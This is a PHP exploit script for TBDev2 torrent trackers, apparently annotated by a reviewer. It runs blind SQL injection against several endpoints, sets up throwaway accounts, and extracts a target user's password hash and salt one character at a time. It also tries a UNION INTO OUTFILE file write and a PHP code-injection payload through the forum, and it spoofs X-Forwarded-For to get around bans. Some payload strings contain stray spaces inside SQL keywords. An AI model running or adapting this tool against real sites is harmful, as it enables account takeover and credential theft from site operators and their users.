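<?php
/*+---------------------------------------------------------+
| TBDev2 Blind SQL Injection Exploit |
| |
| Author: Rostov114 |
| Based on the exploit by Qwazar |
| |
| Credits: +toxa+, NitroIMX, Draco, antichat.ru |
| HAXTA4OK |
+---------------------------------------------------------+*/
// The full "<?php" open tag is used above: the short "<?" form is only
// honoured when short_open_tag is enabled, which php.ini-production turns off,
// so with the short tag the whole file would be emitted as plain text.

// The character-by-character search below issues many HTTP requests in a
// row, so drop the execution time limit and keep going if the client goes away.
set_time_limit(0);
ignore_user_abort(1);
// The preg_match() scraping in this file reads $matches[1] without checking
// for a match first; undefined-index notices are expected and silenced here.
error_reporting(E_ALL & ~E_NOTICE);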
/**
 * Log in to the tracker and return a Cookie header value for later requests.
 *
 * Posts the credentials to takelogin.php through send_xpl() (type 'login')
 * and scrapes the Set-Cookie headers out of the raw response. A `session`
 * cookie is preferred when present; otherwise `uid` and `pass` are used.
 *
 * @param string $url      Base URL of the tracker (must end with '/', see send_xpl()).
 * @param string $name     Account username.
 * @param string $password Account password.
 * @return string|false    "session=...;" or "uid=...; pass=...;" (no "Cookie:" prefix),
 *                         or false when neither form could be assembled.
 *
 * NOTE(review): $name and $password are not urlencode()d, so '&', '=' or '%'
 * in a password corrupts the form body. The character class [\w+\d+] treats
 * '+' literally, i.e. it matches 32 word characters or plus signs.
 * The request goes over plain HTTP (send_xpl() connects to port 80), so the
 * credentials travel in cleartext.
 */
function getcookie($url, $name, $password){
$res = send_xpl($url,"username=$name&password=$password", 'login');
preg_match("/Set-Cookie: uid=(\d+)*;/", $res, $matches);
$uid = $matches[1];
preg_match("/Set-Cookie: pass=([\w+\d+]{32});/", $res, $matches);
$passhash = $matches[1];
preg_match("/Set-Cookie: session=([\w+\d+]{32});/", $res, $matches);
$session = $matches[1];
// When a pattern did not match, $matches[1] is undefined and the variable
// ends up null, so the isset() checks below treat it as absent.
if(isset($session))
$res = "session=$session;";
else
$res = "uid=$uid; pass=$passhash;";
if((isset($uid) and isset($passhash)) or isset($session))
return $res;
else
return false;
}
/**
 * Build one raw HTTP/1.0 request for the tracker, send it, and return the
 * complete response.
 *
 * $u['path'] from parse_url() is concatenated directly with the script name
 * (e.g. "takelogin.php"), so the base URL must end with '/'. The scheme and
 * any explicit port in $url are ignored: the socket always connects to
 * $u['host']:80 with a 30 s connect timeout and die()s if that fails.
 *
 * @param string       $url     Base URL of the tracker.
 * @param string|array $xpl     Per-type payload: the POST body ('login'); the
 *                              email field value ('takesignup', 'check'); a
 *                              relative URL ('requests', 'viewoffers');
 *                              list($file, $path, $type) for 'rss'; ignored by
 *                              'open_way', 'do_reg', 'reg' and 'forum'.
 * @param string       $type    Request kind, one of the switch cases below.
 *                              Any other value leaves $req unset.
 * @param int          $no_read Unused.
 * @return string               Raw response: status line, headers and body.
 *
 * Globals read: $id (target users.id spliced into the SQL payloads), $cookie
 * (sent as the Cookie header) and $formated (sent as X-Forwarded-For when
 * non-empty). Global written: $name, set to the generated username in the
 * 'reg' case so the caller can report it.
 *
 * NOTE(review): several payload strings below contain stray spaces inside SQL
 * keywords ("un i on", "ou t file", "pas shash") as they appear on this page;
 * they are reproduced verbatim here and not corrected.
 */
function send_xpl($url, $xpl, $type, $no_read=0){
global $id, $cookie, $name, $formated;
$u=parse_url($url);
// A URL without a path component is treated as the web root.
$u['path'] = $u['path'] ? $u['path'] : '/';
switch($type)
{
// POST the caller-supplied "username=..&password=.." body to takelogin.php.
case 'login':
$data = $xpl;
$req = "POST ".$u['path']."takelogin.php HTTP/1.0\r\n";
break;
// Registration form with fixed username/password; the caller's payload
// rides in the email field.
case 'takesignup':
$data = "wantusername=admin&wantpassword=123456&passag ain=123456&gender=1&cou ntry=1&year=1970&month=01&day=01&";
$data .= "rulesverify=yes&faqverify=yes&ageverify=yes&email={$xpl}";
$req = "POST ".$u['path']."takesignup.php HTTP/1.0\r\n";
break;
// check_signup.php's email-availability action, same email payload.
case 'check':
$data = "action=email&email={$xpl}";
$req = "POST ".$u['path']."check_signup.php HTTP/1.0\r\n";
break;
// GET details.php with an array-typed id. rss() scrapes a server filesystem
// path out of this response, presumably from an error message that leaks it.
case 'open_way':
$req ="GET ".$u['path']."details.php?id[]= HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;
// First half of registration: fetch signup.php to obtain the captcha hash.
case 'do_reg':
$data = "agree=yes&do=register";
$req = "POST ".$u['path']."signup.php HTTP/1.0\r\n";
break;
// UNION ... INTO OUTFILE through rss.php's passkey parameter: writes the
// chosen column of the target user to torrents/images/<$file>.txt under the
// web-root path $path.
// NOTE(review): list() reassigns the $type parameter to the column name, so
// the "$type != 'rss'" test after the switch no longer recognises this case
// and the POST-style headers get appended after the request was already
// terminated with the blank line.
case 'rss':
list($file, $path, $type) = $xpl;
$req ="GET ".$u['path']."rss.php?passkey=-1'+un i on+select+{$type}+from+users+where+id={$id}+into+ou t file+'{$path}torrents/images/{$file}.txt'+--+ HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;
// Register a throwaway account: generated username (stored in global $name),
// fixed password, email derived from the target host, captcha hash scraped
// from signup.php (falls back to '0' when it is not found).
case 'reg':
$name = gen_name();
preg_match('/name="imagehash" value="([\w+\d+]{32})"/', send_xpl($url, '', 'do_reg'), $match);
$match[1] = $match[1] ? $match[1] : '0';
$data = "wantusername={$name}&wantpassword=123456&passa gain=123456&gender=1&coun try=1&year=1970&month=01&day=01&";
$data .= "rulesverify=yes&faqverify=yes&ageverify=yes&invite=000000000 00000000000000000000000&imagestring=0&";
$data .= "imagehash=".$match[1]."&email={$name}@".$u['host'];
$req = "POST ".$u['path']."takesignup.php HTTP/1.0\r\n";
break;
// Authenticated GET of the relative URL produced by xpl().
case 'requests':
$req ="GET ".$u['path']."$xpl HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;
// Identical to 'requests'; kept separate only so the mode name is explicit.
case 'viewoffers':
$req ="GET ".$u['path']."$xpl HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;
// Forum payload through forumdisplay.php?sortby= (see forum()); sent without
// the session cookie and without X-Forwarded-For.
case 'forum':
$req ="GET ".$u['path']."forum/forumdisplay.php?fid=2&sortby='];var_export(mysql_fetch_array(mysql_query('select+pas shash,secret+fr om+us ers+wher e+id={$id}')));exit();// HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
$req.="Connection: Close\r\n\r\n";
break;
}
// The GET cases above already wrote Host/Cookie/Connection and the blank
// line; every other case is a POST that still needs its headers and body.
if($type != 'requests' and $type != 'forum' and $type != 'open_way' and $type != 'rss' and $type != 'viewoffers')
{
$req .= "Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req .= "Content-Length: ".strlen($data)."\r\n";
$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Connection: close\r\n\r\n";
$req .= $data;
}
//echo $req;
// Port 80 only: an https:// scheme or a custom port in $url is not honoured.
$fs = @fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
fwrite($fs, $req);
// Read until the server closes the connection (we asked for Connection: close).
while (!feof($fs)) {
$res .= fread($fs, 8192);
}
fclose($fs);
//if($type == 'reg')
//echo $res;
return $res;
}
/**
 * Build the blind-injection payload that tests one character of a column.
 *
 * Every variant injects the same expression:
 *   id = if(ascii(substring((select $field from users where id=$id),$pos,1))$condition,
 *           '1', (select 1 union select 2))
 * When the comparison is false the else branch is a two-row scalar subquery,
 * so the server responds with the MySQL error text "Subquery returns ..."
 * that cond() uses as its oracle; when it is true the page renders normally.
 *
 * @param string $field     Column of `users` to read, e.g. "passhash" or "secret".
 * @param string $condition Comparison text appended after ascii(...), e.g. "<97",
 *                          "=-1" or "-1".
 * @param int    $pos       1-based character position (MySQL substring()).
 * @return string           For global $type 'requests' / 'viewoffers': a relative
 *                          URL with the query string. Otherwise ('check',
 *                          'takesignup'): a value for the email field that closes
 *                          the quoted string first; the trailing "@ukrnet.ua" is
 *                          presumably there to satisfy an email-format check.
 *
 * Reads globals $id (target user id) and $type (mode chosen by isVulnerable()).
 *
 * NOTE(review): the payloads contain stray spaces inside SQL keywords as they
 * appear on this page ("subs tring", "fr om"); they are kept verbatim here.
 */
function xpl($field, $condition, $pos){
global $id, $type;
switch($type)
{
case 'requests':
$xpl = "requests.php?action=reset&requ estid=-1+or+id=if(ascii(subs tring((select+$field+fr om+users+wh ere+id=$id),$pos,1))$condition,'1',(select+1+union+select+2))+--+";
break;
case 'viewoffers':
$xpl = "viewoffers.php?filter=or+use rs.id=if(ascii(substring((se lect+$field+from +use rs+where+u sers. id=$id),$pos,1))$condition,'1',(select+1+union+select+2))+--+";
break;
// Email-field form used by the 'check' and 'takesignup' modes.
default:
$xpl = "-1'+or+id=if(ascii(substr ing((select+ $field+from+user s+wh ere+id=$id),$pos,1))$condition,'1',(select+1+union+select+2))+--+ @ukrnet.ua";
break;
}
return $xpl;
}
/**
 * Produce a pseudo-random 11-letter name from a fixed Latin alphabet.
 *
 * The alphabet mirrors the original lookup table: the letters q/w and Q/W
 * are absent from it. rand() is used, which is fine for a throwaway
 * username but is not a cryptographic source.
 *
 * @return string Exactly eleven characters drawn from $alphabet.
 */
function gen_name()
{
$alphabet = 'abcdefghijklmnoprstuvxyzABCDEFGHIJKLMNOPRSTUVXYZ';
$last = strlen($alphabet) - 1;
$out = '';
for ($n = 0; $n < 11; $n++) {
$out .= $alphabet[rand(0, $last)];
}
return $out;
}
/**
 * Blind-injection oracle: is "ascii(substring($field,$pos,1)) $cond$ch" true?
 *
 * Sends the payload built by xpl() through send_xpl() in the current global
 * $type mode. Returns 1 when the response does NOT contain "Subquery returns"
 * (the comparison held and the page rendered normally) and 0 when it does
 * (the comparison failed and the two-row else subquery raised the error).
 * Prints one spinner frame from load() per request as progress feedback.
 *
 * @param string     $url   Base URL.
 * @param string     $field Column name.
 * @param string     $cond  Comparison operator, e.g. '<' or '>'.
 * @param int        $pos   1-based character position.
 * @param int|string $ch    Value the operator is applied to (an ASCII code).
 * @return int 1 (condition true) or 0 (condition false).
 */
function cond($url, $field, $cond, $pos, $ch) {
global $type;
print load();
if(!preg_match('/Subquery returns/', send_xpl($url, xpl($field,$cond.$ch,$pos), $type)))
return 1;
else
return 0;
}
/**
 * Alternative extraction path through rss.php (UNION ... INTO OUTFILE).
 *
 * 1. Requests details.php?id[]= ('open_way') and scrapes a filesystem path
 *    from the text preceding "details.php" in the response — presumably a
 *    PHP error message leaking the script's full path (inferred from the regex).
 * 2. Has rss.php write the target user's `passhash` into
 *    torrents/images/<random>.txt under that path, then reads the file back
 *    over HTTP; the second line of the file is taken as the value.
 * 3. On success repeats the same for `secret` and die()s after printing both.
 *
 * Prints a message and returns normally when either step fails, so the
 * caller can continue with other techniques.
 *
 * NOTE(review): the salt read below fetches $url.$name.'.txt', while the file
 * is written under torrents/images/ (see the 'rss' case in send_xpl()) and the
 * passhash read uses that prefix; the two reads are inconsistent.
 *
 * @param string $url Base URL.
 */
function rss($url)
{
preg_match('/<b>(\S+)details.php/', send_xpl($url, '', 'open_way'), $match);
if($match[1])
{
// Normalise Windows backslashes so the path is usable inside the SQL string.
$match[1] = str_replace('\\', '/', $match[1]);
$name = gen_name();
$xpl = array($name, $match[1], 'passhash');
send_xpl($url, $xpl, 'rss');
$file = @file($url.'torrents/images/'.$name.'.txt');
// A successful OUTFILE yields a two-line file; the value is on line 2.
if(count($file) == 2)
{
$file[1] = str_replace(array("\r\n", "\n"), "", $file[1]);
echo "Trying to get passhash: ".$file[1]." [DONE]\r\n";
$name = gen_name();
$xpl = array($name, $match[1], 'secret');
send_xpl($url, $xpl, 'rss');
$file = @file($url.$name.'.txt');
$file[1] = str_replace(array("\r\n", "\n"), "", $file[1]);
die("Trying to get salt: ".$file[1]." [DONE]");
}
else
{
echo "File rss.php not vulnerable.\r\n";
}
}
else
{
echo "Opening of ways - failed.\r\n";
}
}
/**
 * Last-resort path: read passhash and secret through the bundled forum's
 * forumdisplay.php `sortby` parameter.
 *
 * The payload sent by send_xpl('forum') is PHP source
 * (var_export(mysql_fetch_array(mysql_query(...)));exit();//), which implies
 * the parameter reaches eval()-style evaluation on the server — inferred from
 * the payload shape, not visible in this file. On success the response holds
 * a var_export() dump from which both values are scraped.
 *
 * This function never returns: it die()s both on failure and on success.
 *
 * @param string $url Base URL.
 */
function forum($url)
{
$res = send_xpl($url, '', 'forum');
if(!preg_match("/'passhash' => '([\w+\d+]{32})'/", $res, $match))
{
echo "Forum absents or not vulnerable.\r\n";
die( "Exploit failed: Target is not vulnerable." );
}
echo "Trying to get passhash: ".$match[1]." [DONE]\r\n";
preg_match("/'secret' => '(\S+)'/", $res, $match);
die("Trying to get salt: ".$match[1]." [DONE]");
}
/**
 * Abort unless a `users` row with id = $id exists.
 *
 * Uses the probe xpl("passhash",'-1',1), so the injected test becomes
 * ascii(substring(passhash,1,1))-1. For an existing row that is a non-zero
 * number, the if() takes the '1' branch and the page renders normally. For a
 * missing row the subquery is NULL and the else branch is expected to raise
 * the "Subquery returns" error (MySQL NULL arithmetic — inferred, not shown
 * here); that error text is what triggers the die() below.
 *
 * Reads globals $type (probe mode chosen by isVulnerable()) and $id.
 *
 * @param string $url Base URL.
 */
function check_user($url)
{
global $type, $id;
if(preg_match('/Subquery returns/', send_xpl($url, xpl("passhash",'-1',1), $type)))
{
die("An user does not exist with ID {$id}");
}
}
/**
 * Return the next frame of a four-state text spinner followed by a backspace
 * (chr(8)), so the following frame overwrites it on the terminal.
 *
 * Cycles through \ | / - and wraps around; the position is kept in a static.
 *
 * @return string Two characters: the frame and "\x08".
 */
function load(){
static $frames = array('\\', '|', '/', '-');
static $cursor = 0;
$frame = $frames[$cursor] . chr(8);
$cursor = ($cursor + 1) % 4;
return $frame;
}
/**
 * Probe which injection point the target exposes and set the global $type
 * mode that xpl()/cond()/check_user() will use afterwards.
 *
 * Authenticated mode (both $nickname and $password non-empty):
 *   - logs in via getcookie() (die()s on failure) and stores the cookie in $cookie;
 *   - probes requests.php (result only reported) and viewoffers.php
 *     (die()s when not vulnerable);
 *   - leaves $type = 'viewoffers' regardless of the requests.php outcome.
 * Anonymous mode:
 *   - probes check_signup.php; when vulnerable, $type = 'check';
 *   - otherwise probes takesignup.php; when vulnerable, $type = 'takesignup';
 *   - otherwise registers a throwaway account ('reg', username in global $name),
 *     tries rss(), then the two authenticated probes, and finally forum() as the
 *     last resort (forum() never returns).
 *
 * Every probe uses xpl("passhash","=-1",1): no character has ASCII code -1, so
 * the else-branch subquery fires and the response contains "Subquery returns"
 * exactly when the parameter is injectable.
 *
 * NOTE(review): in authenticated mode a working requests.php is still
 * abandoned when viewoffers.php is not vulnerable — the die() in that branch
 * does not take the earlier result into account.
 *
 * @param string       $url      Base URL.
 * @param string|false $nickname Existing account name, or empty/false for anonymous mode.
 * @param string|false $password Its password.
 * @return void Side effects only: globals $type, $cookie (and $name via send_xpl()).
 */
function isVulnerable($url, $nickname=false, $password=false) {
global $type, $cookie, $name;
if($nickname != '' and $password != '')
{
$type = 'requests';
if(!$cookie = getcookie($url, $nickname, $password))
{
die( "Incorrect login or password!" );
}
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'requests')))
{
echo "File requests.php absents or not vulnerable.\r\n";
}
$type = 'viewoffers';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'viewoffers')))
{
echo "File viewoffers.php absents or not vulnerable.\r\n";
die( "Exploit failed: Target is not vulnerable." );
}
}
else
{
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'check')))
{
echo "File check_signup.php absents or not vulnerable.\r\n";
}
else
{
$type = 'check';
}
// $type is still unset here unless check_signup.php was vulnerable.
if(!$type)
{
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'takesignup')))
{
echo "File takesignup.php not vulnerable.\r\n";
// Register an account so the authenticated endpoints can be tried.
$res = send_xpl($url, '', 'reg');
//print $res;
if(preg_match("/Set-Cookie: pass=([\w+\d+]{32});/", $res, $matches))
{
$passhash = $matches[1];
preg_match("/Set-Cookie: uid=(\d+)*;/", $res, $matches);
$uid=$matches[1];
$cookie = "uid=$uid; pass=$passhash;";
// Some installs also issue forum (MyBB) cookies; forward them as well.
if(preg_match("/Set-Cookie: mybbuser=([A-z0-9_]+);/", $res, $matches))
{
$mybbuser = $matches[1];
preg_match("/Set-Cookie: hash=([\w+\d+]{32});/", $res, $matches);
$hash = $matches[1];
$cookie .= " hash=$hash; mybbuser=$mybbuser;";
}
echo "Register...OK! User: {$name}\r\n";
// rss() die()s on success and returns on failure.
rss($url);
$type = 'requests';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'requests')))
{
echo "File requests.php absents or not vulnerable.\r\n";
}
$type = 'viewoffers';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'viewoffers')))
{
echo "File viewoffers.php absents or not vulnerable.\r\n";
forum($url);
}
}
else
{
echo "Fieled register!\r\n";
forum($url);
}
}
else
{
$type = 'takesignup';
}
}
}
}
/**
 * Recover one character of $field at position $pos by binary search over
 * ASCII codes, using cond() as the oracle (at most two requests per step).
 *
 * @param string $url   Base URL.
 * @param string $field Column name passed through to cond()/xpl().
 * @param int    $pos   1-based character position.
 * @param int    $lb    Lowest candidate code, inclusive.
 * @param int    $ub    Highest candidate code, inclusive.
 * @return string|int   The character, or -1 once the range is exhausted
 *                      (the value lies outside [$lb,$ub] or the oracle
 *                      answered inconsistently).
 */
function getChar($url, $field, $pos, $lb=0, $ub=255) {
do {
$probe = (int) floor(($lb + $ub) / 2);
if (cond($url, $field, '<', $pos, $probe) == 1) {
// Target code is below the probe.
$ub = $probe - 1;
} elseif (cond($url, $field, '>', $pos, $probe) == 1) {
// Target code is above the probe.
$lb = $probe + 1;
} else {
// Neither below nor above: the probe is the character.
return chr($probe);
}
} while ($lb <= $ub);
return -1;
}
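// ---------------------------------------------------------------------------
// Entry point (CLI). Usage: url target_id [login password]
// ---------------------------------------------------------------------------
echo "+---------------------------------------------------+\r\n";
echo "| TBDev2 Blind SQL Injection Exploit |\r\n";
echo "| |\r\n";
echo "| Author: Rostov114 |\r\n";
echo "| Based on Exploit from Qwazar |\r\n";
echo "| |\r\n";
echo "| Credits: +toxa+, NitroIMX, Draco, antichat.ru |\r\n";
echo "| HAXTA4OK |\r\n";
echo "+---------------------------------------------------+\r\n\r\n";
// Both the URL and the target id are mandatory: $argv[2] is interpolated into
// every SQL payload as the users.id to read, so refuse to run without it.
if($argc<3)
{
echo "+------------------------------------------------------+\r\n";
echo "| Multi mode: |\r\n";
echo "| Using tbdev2sql.php url target_id |\r\n";
echo "| |\r\n";
echo "| target_id - id of target member |\r\n";
echo "| Ex.: tbdev2xpl.php http://www.site.com/ 1 |\r\n";
echo "| |\r\n";
echo "| |\r\n";
echo "| Qwazar exploit mode: |\r\n";
echo "| Using tbdev2sql.php url target_id login password |\r\n";
echo "| |\r\n";
echo "| target_id - id of target member |\r\n";
echo "| login, password - login and password of any |\r\n";
echo "| existing account |\r\n";
echo "| Ex.: tbdev2xpl.php http://www.site.com/ 1 test 1234 |\r\n";
die("+------------------------------------------------------+");
}
global $type, $formated;
$url = $argv[1];
$id = $argv[2];
// Optional credentials select the authenticated (Qwazar) mode in isVulnerable();
// an empty string keeps the anonymous mode.
$nickname = isset($argv[3]) ? $argv[3] : '';
$pass = isset($argv[4]) ? $argv[4] : '';
// If the tracker has banned your address, put an IP here: send_xpl() sends it
// as an X-Forwarded-For header to try to get around the ban.
$formated = '';
isVulnerable($url, $nickname, $pass);
check_user($url);
// passhash is read as 32 characters and appears to be hex: the search window
// 47..103 brackets '0'-'9' (48-57) and 'a'-'f' (97-102), both bounds inclusive.
echo "Trying to get passhash: ";
for($i=1;$i<=32;$i++){
$c = getChar($url, "passhash", $i, 47, 103);
if($c === -1)
die("\r\nExploit failed\r\n");
else
echo $c;
}
echo " [DONE]\r\n";
// The salt (`secret`) is read as 20 characters over the full 0..255 range.
echo "Trying to get salt: ";
for($i=1;$i<=20;$i++){
$c = getChar($url, "secret", $i);
if($c === -1)
die("\r\nExploit failed\r\n");
else
echo $c;
}
echo " [DONE]\r\n";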
?>